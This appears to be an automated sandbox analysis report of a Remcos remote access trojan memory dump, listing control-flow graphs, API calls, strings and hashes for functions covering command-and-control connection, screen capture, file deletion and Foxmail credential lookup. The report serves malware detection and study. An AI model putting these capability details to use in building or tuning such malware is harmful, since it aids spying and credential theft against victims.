                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                            • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                          • String ID: 0op$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-OT0ZCG$Software\$User$`.p$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                          • API String ID: 2830904901-61583073
                                          • Opcode ID: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
                                          • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                          • Opcode Fuzzy Hash: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
                                          • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                                          Control-flow Graph

                                          control_flow_graph 494 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 507 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 494->507 508 414faf-414fb6 Sleep 494->508 523 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 507->523 524 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 507->524 508->507 523->524 577 415127-41512e 524->577 578 415119-415125 524->578 579 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 577->579 578->579 606 415210-41521e call 40482d 579->606 607 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 579->607 613 415220-415246 call 402093 * 2 call 41b580 606->613 614 41524b-415260 call 404f51 call 4048c8 606->614 630 415ade-415af0 call 404e26 call 4021fa 607->630 613->630 629 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 614->629 614->630 694 4153bb-4153c8 call 405aa6 629->694 695 4153cd-4153f4 call 401fab call 4135e1 629->695 642 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 630->642 643 415b18-415b20 call 401e8d 630->643 642->643 643->524 694->695 701 4153f6-4153f8 695->701 702 4153fb-4154c0 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 695->702 701->702 725 4154c5-415a51 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 
402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 702->725 948 415a53-415a5a 725->948 949 415a65-415a6c 725->949 948->949 950 415a5c-415a5e 948->950 951 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 949->951 952 415a6e-415a73 call 40b08c 949->952 950->949 963 415aac-415ab8 CreateThread 951->963 964 415abe-415ad9 call 401fd8 * 2 call 401f09 951->964 952->951 963->964 964->630
                                          APIs
                                          • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                          • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                          • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep$ErrorLastLocalTime
                                          • String ID: | $%I64u$0op$5.1.1 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-OT0ZCG$TLS Off$TLS On $`.p$dMG$hlight$name$NG$NG$PG$PG$PG
                                          • API String ID: 524882891-847502806
                                          • Opcode ID: dce4dbc1c9552ef97593c32f0aba4e48013e2fbb171476585201c2d95aca7576
                                          • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                          • Opcode Fuzzy Hash: dce4dbc1c9552ef97593c32f0aba4e48013e2fbb171476585201c2d95aca7576
                                          • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                                          Control-flow Graph

                                          control_flow_graph 971 418eb1-418ef8 CreateDCA CreateCompatibleDC call 419360 974 418efa-418efc 971->974 975 418efe-418f19 call 4193a2 971->975 974->975 976 418f1d-418f1f 974->976 975->976 979 418f71-418f78 call 402093 976->979 980 418f21-418f23 976->980 984 418f7d-418f89 979->984 980->979 981 418f25-418f5c call 4193d8 CreateCompatibleBitmap 980->981 986 418f8a-418f94 SelectObject 981->986 987 418f5e-418f6a DeleteDC * 2 981->987 989 418fa5-418fcc StretchBlt 986->989 990 418f96 986->990 988 418f6b DeleteObject 987->988 988->979 989->990 991 418fce-418fd3 989->991 992 418f97-418fa3 DeleteDC * 2 990->992 993 418fd5-418fea GetCursorInfo 991->993 994 41904f-419057 991->994 992->988 993->994 995 418fec-419000 GetIconInfo 993->995 996 419099-4190ab GetObjectA 994->996 997 419059-419060 994->997 995->994 998 419002-41904b DeleteObject * 2 DrawIcon 995->998 996->990 1001 4190b1-4190c3 996->1001 999 419062-419087 BitBlt 997->999 1000 419089-419096 997->1000 998->994 999->996 1000->996 1002 4190c5-4190c7 1001->1002 1003 4190c9-4190d3 1001->1003 1004 419100 1002->1004 1005 4190d5-4190df 1003->1005 1006 419104-41910d 1003->1006 1004->1006 1005->1006 1008 4190e1-4190eb 1005->1008 1007 41910e-419148 LocalAlloc 1006->1007 1009 419154-41918b GlobalAlloc 1007->1009 1010 41914a-419151 1007->1010 1008->1006 1011 4190ed-4190f3 1008->1011 1014 419196-4191ab GetDIBits 1009->1014 1015 41918d-419191 1009->1015 1010->1009 1012 4190f5-4190fb 1011->1012 1013 4190fd-4190ff 1011->1013 1012->1007 1013->1004 1016 4191d3-41929b call 4020df * 2 call 40250a call 403376 call 40250a call 403376 call 40250a call 403376 DeleteObject GlobalFree DeleteDC 1014->1016 1017 4191ad-4191ce DeleteDC * 2 DeleteObject GlobalFree 1014->1017 1015->992 1034 4192a0-4192c4 call 402055 call 401fd8 * 2 1016->1034 1035 41929d-41929e DeleteDC 1016->1035 1017->979 1034->984 1035->1034
                                          APIs
                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                          • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                            • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                          • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                          • DeleteDC.GDI32(00000000), ref: 00418F65
                                          • DeleteDC.GDI32(00000000), ref: 00418F68
                                          • DeleteObject.GDI32(00000000), ref: 00418F6B
                                          • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                          • DeleteDC.GDI32(00000000), ref: 00418F9D
                                          • DeleteDC.GDI32(00000000), ref: 00418FA0
                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                          • GetCursorInfo.USER32(?), ref: 00418FE2
                                          • GetIconInfo.USER32 ref: 00418FF8
                                          • DeleteObject.GDI32(?), ref: 00419027
                                          • DeleteObject.GDI32(?), ref: 00419034
                                          • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                          • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                          • DeleteDC.GDI32(?), ref: 004191B7
                                          • DeleteDC.GDI32(00000000), ref: 004191BA
                                          • DeleteObject.GDI32(00000000), ref: 004191BD
                                          • GlobalFree.KERNEL32(?), ref: 004191C8
                                          • DeleteObject.GDI32(00000000), ref: 0041927C
                                          • GlobalFree.KERNELBASE(?), ref: 00419283
                                          • DeleteDC.GDI32(?), ref: 00419293
                                          • DeleteDC.GDI32(00000000), ref: 0041929E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                          • String ID: DISPLAY
                                          • API String ID: 4256916514-865373369
                                          • Opcode ID: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                          • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                          • Opcode Fuzzy Hash: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                          • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A

                                          Control-flow Graph

                                          control_flow_graph 1042 412aef-412b38 GetModuleFileNameW call 4020df * 3 1049 412b3a-412bc4 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 1042->1049 1074 412bc6-412c56 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1049->1074 1097 412c66 1074->1097 1098 412c58-412c60 Sleep 1074->1098 1099 412c68-412cf8 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1097->1099 1098->1074 1098->1097 1122 412d08 1099->1122 1123 412cfa-412d02 Sleep 1099->1123 1124 412d0a-412d9a call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1122->1124 1123->1099 1123->1122 1147 412daa-412dcf 1124->1147 1148 412d9c-412da4 Sleep 1124->1148 1149 412dd3-412def call 401f04 call 41c516 1147->1149 1148->1124 1148->1147 1154 412df1-412e00 call 401f04 DeleteFileW 1149->1154 1155 412e06-412e22 call 401f04 call 41c516 1149->1155 1154->1155 1162 412e24-412e3d call 401f04 DeleteFileW 1155->1162 1163 412e3f 1155->1163 1165 412e43-412e5f call 401f04 call 41c516 1162->1165 1163->1165 1171 412e61-412e73 call 401f04 DeleteFileW 1165->1171 1172 412e79-412e7b 1165->1172 1171->1172 1174 412e88-412e93 Sleep 1172->1174 1175 412e7d-412e7f 1172->1175 1174->1149 1176 412e99-412eab call 406b63 1174->1176 1175->1174 1178 412e81-412e86 1175->1178 1181 412f01-412f20 call 401f09 * 3 1176->1181 1182 412ead-412ebb call 406b63 1176->1182 1178->1174 1178->1176 1193 412f25-412f5e call 40b93f call 401f04 call 4020f6 call 413268 1181->1193 1182->1181 1188 412ebd-412ecb call 406b63 1182->1188 1188->1181 1194 412ecd-412ef9 Sleep call 401f09 * 3 1188->1194 1209 412f63-412f89 call 401f09 call 405b05 1193->1209 1194->1049 1207 412eff 1194->1207 1207->1193 1214 4130e3-4131dc call 41bdaf call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 
7 1209->1214 1215 412f8f-4130de call 41bdaf call 41bc1f call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1209->1215 1284 4131e0-413267 call 401fd8 call 401f09 call 401fd8 * 9 1214->1284 1215->1284
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63881986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                          • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                          • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                          • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                          • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                          • Sleep.KERNEL32(00000064), ref: 00412ECF
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                          • String ID: /stext "$0TG$0TG$NG$NG
                                          • API String ID: 1223786279-2576077980
                                          • Opcode ID: d9a727a6c5d83e61f18b2f9f44eefed23ab4c1bdf9ccf4ff8e45248a4edcb3dc
                                          • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                          • Opcode Fuzzy Hash: d9a727a6c5d83e61f18b2f9f44eefed23ab4c1bdf9ccf4ff8e45248a4edcb3dc
                                          • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A

                                          Control-flow Graph

                                          APIs
                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                            • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                            • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                            • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                            • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                          • lstrlenW.KERNEL32(?), ref: 100014C5
                                          • lstrlenW.KERNEL32(?), ref: 100014E0
                                          • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                          • lstrcatW.KERNEL32(00000000), ref: 10001521
                                          • lstrlenW.KERNEL32(?,?), ref: 10001547
                                          • lstrcatW.KERNEL32(00000000), ref: 10001553
                                          • lstrlenW.KERNEL32(?,?), ref: 10001579
                                          • lstrcatW.KERNEL32(00000000), ref: 10001585
                                          • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                          • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                          • String ID: )$Foxmail$ProgramFiles
                                          • API String ID: 672098462-2938083778
                                          • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                          • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                          • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                          • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                          Control-flow Graph

                                          control_flow_graph 1357 414dc1-414dfd 1358 414e03-414e18 GetSystemDirectoryA 1357->1358 1359 414f18-414f23 1357->1359 1360 414f0e 1358->1360 1361 414e1e-414e6a call 441a8e call 441ae8 LoadLibraryA 1358->1361 1360->1359 1366 414e81-414ebb call 441a8e call 441ae8 LoadLibraryA 1361->1366 1367 414e6c-414e76 GetProcAddress 1361->1367 1380 414f0a-414f0d 1366->1380 1381 414ebd-414ec7 GetProcAddress 1366->1381 1368 414e78-414e7b FreeLibrary 1367->1368 1369 414e7d-414e7f 1367->1369 1368->1369 1369->1366 1371 414ed2 1369->1371 1374 414ed4-414ee5 GetProcAddress 1371->1374 1375 414ee7-414eeb 1374->1375 1376 414eef-414ef2 FreeLibrary 1374->1376 1375->1374 1378 414eed 1375->1378 1379 414ef4-414ef6 1376->1379 1378->1379 1379->1380 1382 414ef8-414f08 1379->1382 1380->1360 1383 414ec9-414ecc FreeLibrary 1381->1383 1384 414ece-414ed0 1381->1384 1382->1380 1382->1382 1383->1384 1384->1371 1384->1380
                                          APIs
                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                          • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                          • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                          • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                          • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                          • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                          • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                          • API String ID: 2490988753-744132762
                                          • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                          • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                          • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                          • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE

                                          Control-flow Graph (rendered graph omitted; first basic block 4048c8-4048e8)

                                          APIs
                                          • connect.WS2_32(FFFFFFFF,00854950,00000010), ref: 004048E0
                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                          • WSAGetLastError.WS2_32 ref: 00404A21
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                          • API String ID: 994465650-2151626615
                                          • Opcode ID: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                          • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                          • Opcode Fuzzy Hash: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                          • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                          Control-flow Graph

                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                          • CloseHandle.KERNEL32(?), ref: 00404E4C
                                          • closesocket.WS2_32(000000FF), ref: 00404E5A
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                          • CloseHandle.KERNEL32(?), ref: 00404EBF
                                          • CloseHandle.KERNEL32(?), ref: 00404EC4
                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                          • CloseHandle.KERNEL32(?), ref: 00404ED6
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                          • String ID:
                                          • API String ID: 3658366068-0
                                          • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                          • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                          • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                          • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                          Control-flow Graph (rendered graph omitted; first basic block 40da6f-40da94)

                                          APIs
                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DBD5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LongNamePath
                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                          • API String ID: 82841172-425784914
                                          • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                          • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                          • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                          • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                          Control-flow Graph (rendered graph omitted; first basic block 44acc9-44ace2)

                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                          • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                          • __alloca_probe_16.LIBCMT ref: 0044AE40
                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                          • __freea.LIBCMT ref: 0044AEB0
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          • __freea.LIBCMT ref: 0044AEB9
                                          • __freea.LIBCMT ref: 0044AEDE
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                          • String ID:
                                          • API String ID: 3864826663-0
                                          • Opcode ID: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                          • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                          • Opcode Fuzzy Hash: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                          • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                          APIs
